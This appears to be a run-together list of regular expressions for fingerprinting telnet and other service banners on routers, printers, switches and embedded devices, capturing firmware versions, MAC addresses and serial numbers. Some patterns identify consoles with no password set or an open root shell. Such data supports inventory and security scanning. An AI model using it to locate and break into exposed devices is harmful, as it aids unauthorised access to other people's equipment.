\*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to D-Link Wireless Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0+\r\nServer Model : ([\w._+-]+)\0+\r\nF/W Version : ([\w._-]+)\0.\0+\r\nMAC Address : ([\w ]+) +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\x1b\[H\x1b\[JWelcome at ActiveFax Server\.\r\n\r\n +\xff\xfb\x01\xff\xfb\x03RemoteX Telnet Server V([\d.]+)\n\r\n\rc:\\> +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ZXDSL 831\n\r +\*+\n\r\n\rZTE Corporation, Software Release VIK-([-\w_.]+)\n\r +\*{60}\r\n\r\nThis session allows you to set the TCPIP parameters for your\r\nDell Laser Printer Printer Dell (\w+) MFP Ethernet internal network device, with a hardware\r\naddress of ([0-9A-F:]{17}) \(MSB, Canonical\)\.\r\nIt's an ethernet card\.\r\nNetwork Firmware Version is V([\w._-]+)\(\w+ MFP\) ([\d-]+)\.\r\nSystem Up Time is ([^\r\n.]+)\.\r\n\r\n +\xff\xfb\"\xff\xfb\x03\xff\xfb\x01\xff\xfb\0\xff\xfd\0\n\r\nWelcome to the PDP-10 simulator\r\n\n +\xff\xfb\x01\(Enable\) Password\? +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\r\nCGX3224 Switch Manager Console\. Version: CGX([\d.]+) Bld (\d+),.*\r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[01;00H\r\n\r\0\r\n\r\0[ \t]+\r\n\r\0\r\n\r\0\r\0VersaXpress HPNA Routing Concentrator\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nSportster Pro ([\d.]+) Image Sagem D-BOX2 - Kernel ([-\w_.]+) +\xff\xfb\x01\xff\xfb\x03\r\0\n\*\*\* Lantronix Universal Device Server \*\*\*\r\0\nSerial Number (\d+) MAC address ([\w:]+)\n\r\0Software version 0*([\d.]+) \((\d+)\)\r\0\n\r\0\nPress Enter to go into Setup Mode \r\0\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Fritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nFritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([-\w_+. ]+) Date: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([^\r\n]+)\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03DD-WRT (v\d+)[^\r\n]*\r\nRelease: ([^\r\n]+)\r\n\xff\r\ngateway login: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd\x1f\xff\xfd'\xff\xfd\ +\xff\xfb\x03\xff\xfb\x01\r\n\r\nU\.S\. Robotics\r\nTotal Control \(tm\) NETServer 8/16\r\n\r\nlogin: | p|USRobotics TotalControl NetServer 8/16 telnetd +\xff\xfb\x01\r\n\r\n\*\*\* ADTRAN TSU ESP \*\*\*\r\n\r\n ENTER PASSWORD -> \xff\xfd\x03\xff\xfb\x03 +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix (SCS\d+) Version V([\d/().]+)\n\r\nType HELP +\xff\xfb\x03\xff\xfb\x01\r\n\r\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 1998-2006 Huawei Technologies Co\., Ltd\. All rights reserved\. \*\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X2301 version V\.([-\w_+. ()]+) IPSec from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r *\**\n\r *Welcome to Viking II\. \n\r *\**\n\r\n\rGlobespanVirata Inc\., Software Release VIK-([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[1;1H\x1b\[J\x1b\[22;0H>\x1b\[1K\x1b\[999D\r\0login: +\x1b\[2J\x1b\[1;1fATOS Telnet Server\r\n\r\nCTRL\+d to exit\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03Init Command Line Interface\.\. \r\nBoot Version: [\d.]+\r\nBoot Date: [\d :/]+\r\nATOS Version: ([\d.]+) \([^)]+\)\r\nATOS Date: [\d :/]+\r\nHardware: \w+\r\nProduct Code : \d+\r\nSerial Number : (\d+)\r\nLAN0 MAC Address : ([A-F0-9:]+)\r\nADSL Modem SW version: [\w._-]+ *\r\nADSL Modem API version: \d+\r\nADSL Driver version: [\w._-]+\r\n([\w._-]+) release: ([\w._-]+)+\r\nHW encryption not supported\r\nVinetic fw version : [\w._-]+\r\n\r\nUser name : +\xff\xfb\x01\xff\xfe\x01\n\r\n\r\n\r\n\n\n\n\r\t=+\n\r\t +Samsung SWL-6100AP Configuration\n\r\t +\xff\xfb\x01\xff\xfb\x03\r\0\nMAC address (\w+)\n\r\0Software version ([\w._-]+ \(\d+\)) XPTEXE\r\0\n\n\r\0Press Enter to go into Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03USR ADSL Gateway\r\nLogin: +\xff\xfb\x03\xff\xfb\x01\r\nService Processor login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03ADSL2\+ Wireless Router (\w+) \r\nSoftware Version: ([\w.]+)\r\nLogin name: +\xff\xfb\x01Symbol Access Point User/Admin password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\xff\xfe\"\xff\xfc\"Username Access Verification\r\n\r\nLogin : +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to Telnet Server ([\w._-]+)\r\n\x1b\[0m\x1b\[2J\x1b\[05;28H(SM\w+) Managed Switch\x1b\[07;22H\x7fTallahasseeAdmin-Block\x1b\[15;30Husername:\x1b\[17;30Hpassword:\x1b\[15;39H +\r\n\r\nPassword required, but none set\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1fWelcome to your TiVo\r\n\r\n=\[tivo:root\]-# +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03AMBIT Cable Modem\r\n\r\nlogin: +refused in\.telnetd from [-\w_.]+ logged\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Access DENIED\.\r\n +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;.*Business Policy Switch 2000 +BeanShell ([-\w_.]+) - by Pat Niemeyer \(pat@pat\.net\)\nbsh % +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\r\n\(Aruba800\) \r\nUser: +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;1H\x1b.*BayStack 420 +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03SHARP (MX-\w+) Ver ([-\w_.]+) TELNET server\. +\xff\xfb\x01\xff\xfb\x03Welcome to (DCS-\w+) telnet daemon\r\n\r\nPassword: +\xff\xfb\x01\r\nVoIP Phone V([-\w_.]+) settings\r\nPassword: +\xff\xfb\x01\r\nAIRAYA login: +\xff.\x01\0?\xff\xfd.*Welcome to ViewStation.*Password: +AD6680 Gateway Software\r\n[-\w_]+ \(MAC ([\w:]+)\)\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nHP ProLiant BL p-Class C-GbE2 Interconnect Switch A\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Netgear DM111 ADSL2\+ Modem \r\nSoftware Version: ([-\w_.]+)\r\nLogin name: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0\0\0\0\0\0\r\nServer Model : 2U1P Print Server\0+\r\nF/W Version : ([\w._-]+).*\r\nMAC Address : ([\w ]+) +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\r\n\r\nMMC Technology Telnet\r\nMW-3000AP \w+\( Combo ([-\w_.]+) \)\r\n\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r.*\n\r\n\rSoftware Release R([-\w_.]+)\([^)]+\)\n\rCopyright \(c\) 2001-2003 by D-Link, Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\r\nWelcome to the WhatRoute TELNET Server\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nCNU-550pro login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03picotux login: +\xff\xfb\x03\xff\xfd\x18\xff\xfb\x01\xff\xfd\x1f\xff\xfd!\r\nCadant C3 CMTS\r\n +\r\n\(c\) Copyright 2005, Extron Electronics, IPL T S2, V([\d.]+), +\xff\xfb\x01\xff\xfb\x03\r\n.*HM410dp ADSL2\+ Router\r\n\r\nLogin: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03NS-30G Ver ([-\w_.]+) TELNET server\.\r\0\nCopyright \(c\) \d+ KYOCERA +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X4100 version V\.([-\w_.]+) Rev\. (\d+) \(Patch (\d+)\) from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfe\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfb\x03\xff\xfb\x01\r\nZyXEL Corporation Embedded Telnet Server \(c\) 2000-2003\r\n +\xff\xfb\x01\xff\xfb\x03\*\*\* Lantronix UDS1100 Device Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) \r\0\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 2004-2006 3Com Corp\. and its licensors\. +\xff\xfd\x03\xff\xfb\x01\r\n\r\nProduct type: Avaya (\w+) Media Gateway Release ([\w._-]+)\r\n\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm500 Jade \d+ \(based on ([\w._-]+)\)\r\n\rwelcome on your dreambox! - Kernel ([\w._-]+) \([\d:]+\)\.\r\n\rdm500 login: +\r\nSorry, this system is engaged by a rlogin session\.\r\nHost IP address: ([\d.]+)\.\nLogin name: ([\w._-]+)\.\n +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\n\r\nUser Access Verification\r\n\r\nUsername: +Connected\r\nUse log command to LOGON\r\n +\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) Command Shell\r\nPassword: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) V([\w.]+) Command Shell +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4021\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0SNTP Version ([\d.]+) Server ([\w._-]+)\n\r\0\r\0\nMAC address (\w+)\n\r\0Software version V[\d.]+ \(\d+\) ([\w._-]+)\r\0\nPassword : +uShare \(([\w._-]+)\) \(Built .*\)\nFor a list of registered commands type \"help\"\n\n> +SMPlayer ([\w._-]+)\r\nType help for a list of commands\r\n +Sorry, already connected\.\r\n| p|Slirp PPP/SLIP-on-terminal emulator telnetd +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\r\nCopperJet ([\w._-]+) RouterPlus .*\r\nFirmware version: ([\w._ -]+)\r\nAllied Data Technologies\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x03Welcome to the Windows CE Telnet service on MP370\r\n\r\nPocket CMD v ([\w._-]+)\r\n\\> \n\r\n\\> \\> +\xff\xfb\x01\r\n3Com Access Point 7760 login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 login: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03PRICOM 3100 Ver ([\w._-]+) TELNET server\.\r\0\nCopyright \(C\) 2002-2004 silex technology, Inc\.\r\0\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\r\n\r\r\nWelcome to Aerohive Wireless Product\r\r\n\r\r\nlogin: +\xff\xfb\x01\xff\xfb\x03\r\nLexmark International Telnet\r\n\r\nlogin: +\xff\xfb\x03\xff\xfb\x01Alcatel-Lucent: A7510\r\nA7510_(R\d+) .*\r\n\r\n\r\nLogin: +\xff\xfd\x18\xff\xfd\x1f\xff\xfd!\xff\xfd\x17\xff\xfb\x01\xff\xfb\x03\xff\xfd \xff\xfd#\r\n\r\n Welcome to OpenVMS \(TM\) VAX Operating System, Version V([\w._-]+) \r\n\r\n\r\0Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n>>> System ([\w._-]+) - OpenVMS Alpha V([\w._-]+) <<<\r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nGbE2c L2/L3 Ethernet Blade Switch for HP c-Class BladeSystem\.\r\n\r\nCopyright\(C\)2003 Hewlett-Packard Development Company, L\.P\.\r\n\r\n\r\nEnter tacacs username: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03U\.S\. Robotics ADSL 4-Port Router\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0\*\*\* Mitsubishi ProjectorView Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) MELCO\r\0\n\n\r\0Press Enter for Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n === IMPORTANT ============================\r\n Use 'passwd' to set your login password\r\n this will disable telnet and enable SSH\r\n ------------------------------------------\r\n\r\n\r\nBusyBox v(.*) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n ___ ___ ___ \r\n\( _`\\ _ /'___\)'___\) Bifferboard mini-distribution v([\w._-]+)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 =======================\r\n DSL-500B \r\n =======================\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWelcome to Linux \(ZEM500\) for MIPS\r\n\rKernel ([\w._-]+) \w+ on an MIPS\r\n\rZEM500 login: +\xff\xfb\x01\xff\xfe\x01Connected\r\n\n\rAironet BR500E V([\w._-]+) Main Menu +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TrioLink \(ADSL IAD\)\r\nLogin: +Linux ([\w._-]+) \[INSTALL: [\d-]+\]\nLASTPATCH: [\d:-]+\n +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\x1b\[0;37;40m\x1b\[2J\x1b\[1;1HLogin Name: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Xcelerator IP \r\nLogin: +odec=\d+ u=\d+, p=\d+, i=\d+, max entries = \d+ \r\n\d+: IMGREQUEST: request_stats, image buffers available = \d+ \r\n\d+: MAIN: (\d+) images\(J=\d+, P=\d+, I=\d+\) stored on disk in last minute +\r\nSiemens 5940 T1E1 \[COMBO\] Router \([\w._-]+\) v([\w._-]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to Dinion-IP-NWC [\d.]+ from [\d.]+\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfe\x01\xff\xfd\0\r\nser2net port \d+ device (/dev/[-\w_]+) \[\d+ \w+\] \(Debian GNU/Linux\)\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rTerminal shell v1\.0\n\r\rCopyright \xa92008 Motorola, Inc\. All rights reserved\.\n\r\rNetopia Model ([\d-]+)(?: AnnexA)? High-Power Wireless DSL Ethernet Managed Switch\n\rRunning Netopia SOC OS version ([\w.-]+ \(build \w+\))\n +\xff\xfb\x01\xff\xfb\x03ssss ssss sss s ss sss sss sss sssss \r\n s s s s s s s s s s s s s \r\n s s s s s s s s s s s \r\n s s ss s ss ssss s sss s ssss s s sss \r\n s s s s s s s s s s s s s s s \r\n s s s s s s s sss s s s s s s \r\n s s s s s s s s s s s s s s s s s \r\nssss ssss ssssss sss sss sssss ss sssss sss sss sssss\r\nLogin: +\r\nPRO2 Control Console\r\n +\w{12}\r\nETHMAC ([0-9a-f:]+)\r\nWIFIMAC ([0-9a-f:]+)\r\n> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWireless AP Manager Console [^\r\n]+\r\n please enter your password: +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05Login: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nYou are connected to configuration tool\r\nEnter the password: +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05\r\n\*\*\* Welcome to VTM \*\*\*\r\n\r\n\r\n\rLogin : +\r\nCEN-IDOC Control Console\r\n\r\nCEN-IDOC> +\xff\xfb\x01\r\nWelcome to Ring v([\d.]+) Copyright \(C\) AMX Corp\. 2002-2003\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TESTING MODEL ADSL Router\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\[([^]]*)\]\[([^]]*)\]\[([^]]*)\]\r\n +\xff\xfe\"\xff\xfb\x01\x1b<\x1b>\x1b\[\?25l\x1b\[0m\x1b\[2J\x1b\(B\x1b\)0\x0f\x1b\[7m\x1b\[f Areca Technology Corporation RAID Controller +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\r\n\r\n\*{76}\r\n\r\n +Minolta Network Configuration Utility\r\n +Minolta\r\n +Version ([\w.]+)\r\n +\xff\xfd\x03\xff\xfe\x01\xff\xfb\x01\s+ZebraNet Internal Wired PS Configuration Utility\r\n\r\n Type your password\. Press Enter when finished\.\r\n\r\n Password: +\xff\xfb\x01\n\rWelcome to TrueTime Network Interface\n\r\rUser name: +MythFrontend Network Control\r\nType 'help' for usage information\r\n---------------------------------\r\n# +\x1b\[0m\r\nWelcome to (IC-\d+)!\r\n\r\n\x1b7\x1b\[\?25l\x1b\[501;501H\x1b\[6n\x1b8\x1b\[\?25h\r\x1b\[0m\x1b\[1mIC-\d+ # \x1b\[0m\x1b\[J\r\x1b\[10C +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x0c\x1b\[2JEnter Password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\r\n\rWelcome to DreamBox\.\r\n\rRunning under Kernel ([\w._-]+) \.\r\n\rBased on (Gemini [\w._-]+ GUI)\.\r\n\rKernel and utilities compiled by SatDream\.\r\n\r\r\n\r\r\n\rhttp://www\.satderam\.ru , info@satdream\.ru , dreambox@satdream\.ru\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nBNT Layer 2/3 Copper Gigabit Ethernet Switch Module for IBM BladeCenter\.\r\n\r\n\r\nEnter password: | p|Nortel Layer 2/3 Gigabit Ethernet switch for IBM BladeCenter +\xff\xfb\x01\xff\xfd\"\r\n##### #### ## ## #### #####\r\n## ## ## ## ## # ## ## ## ##\r\n## ## ###### ####### ## #####\r\n## ## ## ####### ## ## ##\r\n## ## ##### ## ## #### ######\r\n A Butter Team Creation\r\n\r\nPassword : +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfe\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05TiMOS-([\w._-]+) cpm/hops ALCATEL SR (\w+) +\xff\xfb\x01\xff\xfb\x03\r\n\x1b\[1;1H\x1b\[2J\r\n\r\nObeh\xf6riga \xe4ga ej tilltr\xe4de\r\n\r\n\xf6vertr\xe4delse beivras\.\r\n\r\n\rUsername: +\n\rTA-005-FXO1-122M : CLI\n\rLogin : +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista/2008 Ver\. ([\w._-]+)\n\rEvaluation copy, \d+ users enabled\. Expiration date is ([\d/]+)\.\n\r\n\rUser \d+ of \d+\n\r\n\rlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\+{79}\r\n\r\+{33}#############\+{33}\r\n\r\+{28}###### ######\+{28}\r\n\r +\xff\xfb\x01\xff\xfb\x03BR-telnet@(FES\w+) Router> +\xff\xfb\x01\xff\xfb\x03\r\n\r\nCopyright \(c\) 2005 - 2008 Enterasys, Inc\. All rights reserved\.\r\n\n\r\n\r\n\r\0Username: +\r={74}\n\rTransition Networks Telnet Server\n\rSystem name: SMKG-PKGEAST-([\w._-]+)\n\rPress CTRL-D to disconnect\.\n\rEnter password: +\xff\xfb\x03\xff\xfb\x01\r\n \*{73}\r\n This is a private system\. \r\n Do not attempt to login unless you are an authorized user\. \r\n Any authorized or unauthorized access or use may be monitored and can\r\n result in criminal or civil prosecution under applicable law\.\r\n \*{73}\r\n\r\nMP login: +\xff\xfe\"\xff\xfb\x01\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[5B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[6B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[7B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[2B Verify Password \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[4B \x0e\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[8C\x1b\[9B\x1b\[1Blqqqqqqqqqqqqqqqqqqqk\x1b +Sorry, new remote sessions are disallowed by current switch configuration\. +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\x1b\[H\x1b\[J\r\nWireless Router Manager Console , Version : ([\w._-]+)\r\nPlease enter your password : +\xff\xfb\x01\xff\xfb\x03\*{60}\r\n\* WARNING ALERT: AUTHORIZED USERS ONLY! +\*\r\n\* +\*\r\n\* All activities conducted on this system may be monitored \*\r\n\* and recorded\. If you are not an authorized user, log off \*\r\n\* immediately\. Illegal entry, misuse, and / or criminal \*\r\n\* activity will be documented and prosecuted to the full \*\r\n\* extend of the law\. +\*\r\n\*{60}\r\n\r\n\r\nPress to accept and continue the login process\.\.\.\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\x1b\[2J\x1b\[1;1H\x1b\[1mwb-adtran-\w+ ADTRAN (TDU-\w+)\x1b\[0m\x1b\[2;1HConnecting\.\.\.\. +\r\n%connection closed by remote host!\0 +Sorry, telnet is not allowed on this port! +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nBUFFALO INC\. LinkStation series HS-DHGL\(JINMU\)\r\n\rFENCHURCH login: +\nFelix Remote Shell Console:\r\n============================\r\n\r\n-> +\r\n\r\nBackup Server Telnet Session\r\n\r\nUser: +\xff\xfb\x01\xff\xfd\"\[game001\] remote control session\.\r\nPassword:\0 +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve J\w+ Switch ([\w-]+)\r\n\rSoftware revision ([\w._-]+)\r\n +\xff\xfb\x01\r\nNetDVRDVS: +nodnsquery/[\d.]+ is not authorized to use the telnet proxy\r\n +\xff\xfc\x01\xff\xfd\"ixProxy V([\d.]+), Copyright \(C\) \d+ Ixia Communications\r\nEnter target port ip address as login name \(example: 10\.0\.1\.1\)\r\nlogin: +\0\0\0H\0\0\0\x02\x0fTimeEdit131\. +0301&<\x16\0\x84\xc7\x02\xe0\xe1\xb1\x008\x13\x1e\x0b\x80<\x16\0\xc7\t\x8f\x05\xc0\xf0X\0\x1c\xc2c\x01p\x1e\x0b\x80\xe3c\x01p\xdcX\0\x1c7\x8f\x05\xc0q\x0b\x80\xe3F\xc7\x02\xe0\xb8,\0\x8e\x1b\xb1\x008n\x05\xc0q\xa3\x008n\xb4\x02\xe0\xb8\xd1\x01p\xdch\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\x03\0\x04\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\r\0\x03\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x9a\x20\xd0Z\x1e\x1b\xa3\*\xf2\xdd\xe2\(\xc3sp&\xda\xe4Yp\xdbET\xf9\x8cc\xc24\*Y\xbe\xb3\xba\xd6%\xf5\xb668\xad\xab>@D<\x01\xdd>\)\xdb\x18\xf55\xd1\xba\x96\x1c\x17\x17\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x01 +\x0f\0\n\0\x01\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x0b\0\0\0GBXRemote 2 +VTUN server ver \. (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +VTUN server ver \(.*\) (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +250 OK moleSoftware VHCS2 Server Welcomes You !\r\n +TrueWeather\r\n\r\n> +\x96\xfeS\xab +\+ read portFile\n\+ head -1\n\+ find /var/websm/ +([-\w_.]+) xine-ui ([\d.]+) remote server\. Nice to meet you\.\n +Vty password is not set\.\r\n +\r\nUser Access Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfe\"\xff\xfd\x1fPassword: +bp[-\w]+: error while loading shared libraries: libstdc\+\+-libc6\.2-2\.so\.3: cannot open shared object file: No such file or directory\n +\0\x0e@........\0\0\0\0\0 +\0\*@.*\0\0\0\0\0 +\0<\xaa\xc5\r\^\xf7\x1b\xd1\xe1a/\xe8\x17P\x9dOb\xbb\x93\x87\xe0\xf3v\x81K\xa4!\xe6\xc7\x01\x977u5A\xd1M\x1b;\xc7\xcb\x87\xb5\x87\xf3~\xc8w\xef\xd3\x87eA\0\^\xbf\xc5\x93i\xf6\x87 +\xa5A\0\x01\0\0\0,\0\0\0\x02\0\0\0L\0\0\0\x08Connect\0\0\0\0x\0\0\0\x0857222\0\0\0 +.\x01.[\x02\x03]\x01\d+\0 +OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n +SuSE Meta pppd \(smpppd\), Version ([\d.]+)\r\n 